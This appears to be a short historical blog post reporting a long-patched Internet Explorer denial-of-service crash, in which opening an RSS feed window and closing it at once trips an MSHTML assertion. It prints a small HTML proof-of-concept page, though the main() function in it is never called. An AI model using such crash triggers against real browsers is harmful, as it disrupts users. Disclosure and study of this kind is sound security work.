DoS: Opening and Immediately Closing an RSS Feed Window

A brief crash report. Opening a new window with RSS feed XML content and closing it immediately triggered an assertion failure in MSHTML!CDwnCrit::Enter.

<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>DoS_newFeedsWindowClose</title>
</head>
<body>
<script>
function main()
{
	win = window.open("feeds.xml");
	win.close();
}
</script>
</body>
</html>

The crash had unknown exploitability. Closing the window while the feed viewer was still initializing left a download context (CDwnCrit) in an inconsistent state, triggering the assertion MSHTML!CDwnCrit::Enter+0xff. It was sometimes intermittent and required a couple of attempts to reproduce reliably.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [EoP: Crash Changing iFrame URL from RSS Feed] :: [DoS: Loading Any URL via the MHTML Protocol Handler] >